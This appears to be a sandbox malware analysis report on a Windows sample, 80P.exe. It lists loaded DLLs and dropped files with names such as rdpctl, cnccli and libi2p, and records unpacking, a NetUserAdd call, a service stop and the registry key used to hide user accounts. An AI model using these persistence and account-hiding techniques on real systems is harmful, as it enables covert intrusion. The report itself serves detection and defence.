Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samlib.dll

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

File written: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 80P.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 80P.exe

Static file information: File size 13431296 > 1048576

Source: 80P.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x9a0600
Source: 80P.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x152400

Source:	Binary string: RfxVmt.pdb source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.20.dr
Source:	Binary string: RfxVmt.pdbGCTL source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.20.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\80P.exe

Unpacked PE file: 0.2.80P.exe.3440000.1.unpack

Source: rfxvmt.dll.20.dr

Static PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FF6BFD6DEBE GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

20_2_00007FF6BFD6DEBE

Source: 80P.exe	Static PE information: section name: .didata
Source: jvnu3e85o6ls9huft0apy3731vg.exe.1.dr	Static PE information: section name: .xdata
Source: main.exe.9.dr	Static PE information: section name: .xdata
Source: rdpctl.dll.20.dr	Static PE information: section name: .xdata
Source: samctl.dll.20.dr	Static PE information: section name: .xdata
Source: prgmgr.dll.20.dr	Static PE information: section name: .xdata
Source: dwlmgr.dll.20.dr	Static PE information: section name: .xdata
Source: cnccli.dll.20.dr	Static PE information: section name: .xdata
Source: libi2p.dll.20.dr	Static PE information: section name: .xdata
Source: evtsrv.dll.20.dr	Static PE information: section name: .xdata
Source: termsrv32.dll.20.dr	Static PE information: section name: .xdata
Source: 6DPA479I.20.dr	Static PE information: section name: .xdata
Source: TzijR9kt.20.dr	Static PE information: section name: .xdata
Source: oWkqS6Ji.20.dr	Static PE information: section name: .xdata
Source: 9m9shiPj.20.dr	Static PE information: section name: .xdata
Source: wwgq2y6S.20.dr	Static PE information: section name: .xdata
Source: NCdDxWNe.20.dr	Static PE information: section name: .xdata
Source: ia0qD2w9.20.dr	Static PE information: section name: .xdata
Source: I2Hoxnam.20.dr	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EBF262 push es; retf	0_2_02EBF263
Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EA675D push esi; ret	0_2_02EA675F
Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EA3D4E push eax; iretd	0_2_02EA3D4F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EC0FC37 push rsp; ret	20_2_00007FFE0EC0FC38
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE1174FC37 push rsp; ret	31_2_00007FFE1174FC38

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FFE0E16521B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,

20_2_00007FFE0E16521B

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\user\Desktop\80P.exe	File created: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ieIgHN2A	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\wwgq2y6S	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\9m9shiPj	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\TzijR9kt	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ia0qD2w9	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\NCdDxWNe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\I2Hoxnam	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\oWkqS6Ji	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\6DPA479I	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ieIgHN2A	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\wwgq2y6S	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\9m9shiPj	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\TzijR9kt	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ia0qD2w9	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\NCdDxWNe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\I2Hoxnam	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\oWkqS6Ji	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\6DPA479I	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ieIgHN2A	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\6DPA479I	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\TzijR9kt	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\oWkqS6Ji	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\9m9shiPj	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\wwgq2y6S	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\NCdDxWNe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ia0qD2w9	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\I2Hoxnam	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FF6BFD68C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

20_2_00007FF6BFD68C4A

Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe

Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
